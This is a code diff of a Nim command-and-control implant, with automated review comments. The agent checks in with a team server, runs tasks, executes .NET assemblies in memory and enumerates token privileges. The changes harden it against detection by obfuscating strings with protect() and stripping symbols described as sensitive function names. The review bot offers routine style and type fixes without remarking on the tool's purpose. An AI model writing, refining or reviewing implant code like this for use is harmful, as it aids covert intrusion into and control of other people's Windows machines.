diff --git a/src/agent/core/clr.nim b/src/agent/core/clr.nim
index 8f1646b..91f07f5 100644
--- a/src/agent/core/clr.nim
+++ b/src/agent/core/clr.nim
@@ -1,5 +1,4 @@
 import winim/[lean, clr]
-import os
 import ../utils/[hwbp, io]
 import ../../common/utils
@@ -60,7 +59,7 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri
 # Create AppDomain
 let appDomainType = mscorlib.GetType(protect("System.AppDomain"))
 let domainSetup = mscorlib.new(protect("System.AppDomainSetup"))
-domainSetup.ApplicationBase = getCurrentDir()
+domainSetup.ApplicationBase = protect("C:/Windows/System32")
 domainSetup.DisallowBindingRedirects = false
 domainSetup.DisallowCodeDownload = true
 domainSetup.ShadowCopyFiles = protect("false")
diff --git a/src/agent/core/context.nim b/src/agent/core/context.nim
index ca6d969..77ed7fa 100644
--- a/src/agent/core/context.nim
+++ b/src/agent/core/context.nim
@@ -1,4 +1,4 @@
-import parsetoml, system
+import parsetoml
 import ../utils/io
 import ../../common/[types, utils, crypto, serialize]
diff --git a/src/agent/core/process.nim b/src/agent/core/process.nim
index 8c65e0d..32d0e33 100644
--- a/src/agent/core/process.nim
+++ b/src/agent/core/process.nim
@@ -1,7 +1,7 @@
 import winim/lean
-import strutils, strformat, tables, algorithm
+import tables
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils
 import token
 type
diff --git a/src/agent/core/token.nim b/src/agent/core/token.nim
index 3f452c6..44cea02 100644
--- a/src/agent/core/token.nim
+++ b/src/agent/core/token.nim
@@ -1,7 +1,7 @@
 import winim/lean
 import strformat
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils
 #[ Token impersonation & manipulation
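Review bot: `domainSetup.ApplicationBase = protect("C:/Windows/System32")` replaces a value derived from process state with a fixed path and carries no comment, so the next reader cannot tell why the working directory was dropped or whether the directory is required to exist. I would add a one-line comment such as `# Fixed ApplicationBase instead of getCurrentDir(); the os import was removed with it`. The body of dotnetInlineExecuteGetOutput starts and continues outside the hunk; the other hunks on this line are unused-import cleanups.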
@@ -176,7 +176,7 @@ proc getTokenGroups(hToken: HANDLE, apis: Apis = initApis()): string =
 groupCount = pGroups.GroupCount
 groups = cast[ptr UncheckedArray[SID_AND_ATTRIBUTES]](addr pGroups.Groups[0])
- result &= fmt"Group memberships ({groupCount})" & "\n"
+ result &= protect("Group memberships (") & $groupCount & protect(")\n")
 for i, group in groups.toOpenArray(0, int(groupCount) - 1):
 result &= fmt" - {sidToString(group.Sid, apis):<50} {sidToName(group.Sid)}" & "\n"
@@ -203,9 +203,9 @@ proc getTokenPrivileges(hToken: HANDLE, apis: Apis = initApis()): string =
 privCount = pPrivileges.PrivilegeCount
 privs = cast[ptr UncheckedArray[LUID_AND_ATTRIBUTES]](addr pPrivileges.Privileges[0])
- result &= fmt"Privileges ({privCount})" & "\n"
+ result &= protect("Privileges (") & $privCount & protect(")\n")
 for i, priv in privs.toOpenArray(0, int(privCount) - 1):
- let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: "Enabled" else: "Disabled"
+ let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: protect("Enabled") else: protect("Disabled")
 result &= fmt" - {privilegeToString(addr priv.Luid):<50} {enabled}" & "\n"
@@ -213,15 +213,15 @@ proc getTokenInfo*(hToken: HANDLE): string =
 let apis = initApis()
 let (tokenId, tokenType) = getTokenStatistics(hToken, apis)
- result &= fmt"TokenID: 0x{tokenId}" & "\n"
- result &= fmt"Type: {tokenType}" & "\n"
+ result &= protect("TokenID: 0x") & tokenId & "\n"
+ result &= protect("Type: ") & tokenType & "\n"
 let (username, sid) = getTokenUser(hToken, apis)
- result &= fmt"User: {username}" & "\n"
- result &= fmt"SID: {sid}" & "\n"
+ result &= protect("User: ") & username & "\n"
+ result &= protect("SID: ") & sid & "\n"
 let isElevated = getTokenElevation(hToken, apis)
- result &= fmt"Elevated: {$isElevated}" & "\n"
+ result &= protect("Elevated: ") & $isElevated & "\n"
 result &= getTokenGroups(hToken, apis)
 result &= getTokenPrivileges(hToken, apis)
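Review bot: In the getTokenInfo hunk, `result &= protect("TokenID: 0x") & tokenId & "\n"` concatenates `tokenId` and `tokenType` directly, which only compiles if getTokenStatistics returns them as strings; the replaced `fmt` call stringified any type, so a numeric id would now need `$tokenId` (or a hex conversion, since the literal `0x` prefix otherwise promises hex that nothing produces). The same holds for `username`/`sid` from getTokenUser, while `$isElevated` on the Elevated line is already converted. The tuple types are not visible in this hunk, so this may already be satisfied and is worth a quick check. getTokenGroups and getTokenPrivileges begin outside their hunks.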
diff --git a/src/agent/main.nim b/src/agent/main.nim
index 1c06344..705c21c 100644
--- a/src/agent/main.nim
+++ b/src/agent/main.nim
@@ -19,7 +19,7 @@ proc main() =
 3. Register to the team server if not already connected
 4. Retrieve tasks via checkin request to a GET endpoint
 5. Execute task and post result
- 6. If additional tasks have been fetched, go to 3.
+ 6. If additional tasks have been fetched, go to 6.
 7. If no more tasks need to be executed, go to 1.
 ]#
 while true:
diff --git a/src/agent/nim.cfg b/src/agent/nim.cfg
index 9554f7e..0b3f106 100644
--- a/src/agent/nim.cfg
+++ b/src/agent/nim.cfg
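Review bot: The rewritten step `6. If additional tasks have been fetched, go to 6.` now refers to itself, so the numbered description no longer leads back to executing the next task. Judging from steps 4 and 5, the intended target is presumably step 5, i.e. `6. If additional tasks have been fetched, go to 5.`; the old text pointed at 3, which the commit evidently considered wrong. The body of main continues outside the hunk.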
@@ -2,7 +2,8 @@ -d:agent -d:release --opt:size ---passL:"-s" # Strip symbols, such as sensitive function names +--l:"-Wl,-s" +# --l:"-Wl,-subsystem,windows" # Prevent console window -d:CONFIGURATION="PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER" -d:MODULES="511" -d:VERBOSE="true" 
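Review bot: The replacement line `--l:"-Wl,-s"` drops the comment that documented what the flag is for, so its purpose is now only recoverable from history. `--l` appears to be the short alias of `--passL`, so the linker still receives the strip option either way; keep a short trailing comment on the new line, e.g. `--l:"-Wl,-s" # Strip symbols`. The commented-out subsystem line is likewise undocumented as to why it is disabled.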
diff --git a/src/agent/protocol/registration.nim b/src/agent/protocol/registration.nim
index 73575ca..94bc235 100644
--- a/src/agent/protocol/registration.nim
+++ b/src/agent/protocol/registration.nim
@@ -99,7 +99,7 @@ type
 productType: ProductType
 name: string
-const VERSIONS = [
+let versions = [
 # Windows 11 / Server 2022+
 # WindowsVersion(major: 10, minor: 0, buildMin: 22631, buildMax: 0, productType: WORKSTATION, name: protect("Windows 11 23H2")),
 # WindowsVersion(major: 10, minor: 0, buildMin: 22621, buildMax: 22630, productType: WORKSTATION, name: protect("Windows 11 22H2")),
@@ -135,7 +135,7 @@ const VERSIONS = [
 WindowsVersion(major: 5, minor: 1, buildMin: 0, buildMax: 0, productType: WORKSTATION, name: protect("Windows XP")),
 ]
-proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool =
+proc matchVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool =
 if info.dwMajorVersion != version.major or info.dwMinorVersion != version.minor:
 return false
 if productType != version.productType:
@@ -147,8 +147,8 @@ proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType
 return true
 proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string =
- for version in VERSIONS:
- if version.matchesVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
+ for version in versions:
+ if version.matchVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
 if productType == DC:
 return version.name & protect(" (Domain Controller)")
 else:
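Review bot: `const VERSIONS = [` becoming `let versions = [` moves the table from a compile-time constant to a module-level value initialised at runtime, presumably because the `protect(...)` calls in the entries cannot be evaluated at compile time, but nothing records that reason. Add `# let, not const: protect() is evaluated at runtime` above the declaration so the change is not reverted later. Separately, renaming the `bool` predicate `matchesVersion` to `matchVersion` loses the predicate reading; a name like `matchesVersion` or `isMatch` reads more naturally at the `if version.matchVersion(...)` call site in the last hunk. matchVersion's body continues outside its hunk.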